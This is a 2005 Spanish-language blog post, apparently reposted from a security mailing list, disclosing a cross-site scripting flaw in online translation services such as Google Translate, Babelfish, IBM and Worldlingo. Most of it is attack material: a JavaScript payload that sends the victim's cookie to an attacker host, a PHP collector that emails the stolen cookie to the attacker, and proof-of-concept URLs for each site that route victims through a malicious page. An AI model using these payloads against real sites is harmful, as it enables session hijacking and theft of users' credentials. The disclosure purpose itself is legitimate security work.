ecoestadistica.com

domingo, diciembre 25, 2005

Multiple Translation websites XSS vulnerability: Google, Altavista, IBM, freetranslation, worldlingo, etc

Lo que sigue es una vulnerabilidad XSS encontrada en los paginas de los traductores online.basicamente el metodo usado por estas paginas consiste en cargar una URL elegida por un usuario con el proposito de traducirla,en hecho luego que la pagina es traducida no se filtra el contenido de la web antes de reflejar el resultado en el browser del usuario.
Un atacante remoto puede construir un código malévolo en una web y subirla a su servidor y hacer que un usuario vulnerable que visita la página medio de una web de traduccion,ejecute el contenido del código en el browser del cliente.
Un ejemplo de código puede ser un código de Javascript para robar a la víctima la cookie


Ejemplo de pagina maliciosa seria:

<>location.href='http://www.webatacante.com/XXX.php?cookie='+escape(document.cookie)< / SCRIPT>

El código Javascript dirigira a víctima a el script php del atacante
para tomar la información de la cookie y entonces regístrela y envíarla al email del atacante.

Ejemplo de un script php:

< ? php $cookie = $_GET['cookie']; $ip = getenv("REMOTE_ADDR"); $msg = "Cookie: $cookie\nIP Address: $ip"; $subject = "cookie"; mail("mail_del_atacante", $subject, $msg); ? >

Como proposito de prueba se puede utilizar el codigo siguiente:

<> alert('VULNERABLE'); alert(document.cookie);< / script >

Prueba de Concepto:

paralink:

http://webtranslation.paralink.com/webtranslation.asp?clientid=default&appid=default&b=1&dir=en/fr&dic=general&extsvr=&auto=1&url=http://www.atacante.com/codigo-malicioso.html

Google:

http://translate.google.com/translate?u=http://www.atacante.com/codigo-malicioso.html

Freetranslation:

http://fets3.freetranslation.com/?Url=http%3A%2F%2Fwww.atacante.com%2Fcodigo-malicioso.html&Language=English%2FSpanish&Sequence=core

Altavista:

http://babelfish.altavista.com/babelfish/urltrurl?tt=url&url=http://www.atacante.com/codigo-malicioso.html&lp=zh_en

IBM:

http://www.alphaworks.ibm.com/aw.nsf/html/mt
http://192.195.29.104/demand?mtlang=enfr&translate=http%253A%252F%252Fwww.atacante.com%252Fcodigo-malicioso.html

Worldlingo:

http://www.worldlingo.com/wl/services/S221S1U3QrQ4rVX1J4x4O5WifQlI6nxpL/translation?wl_trglang=DE&wl_rurl=http%3A%2F%2Fwww.atacante.com&wl_url=http%3A%2F%2Fwww.atacante.com%2Fcodigo-maliciso.html

Comprendium:

http://www.comprendium.es/index_demo_text_ca.html

online-translator:

http://www.online-translator.com/url/tran_url.asp?lang=en&url=http%3A%2F%2Fwww.atacante.com%2Fcodigo-malicioso.html&direction=er&template=General&cp1=NO&cp2=NO&autotranslate=on&transliterate=on&psubmit2.x=44&psubmit2.y=12

systranbox:

http://www.systranbox.com/systran/box

fuente:seclists

Salu2

ecoestadistica.com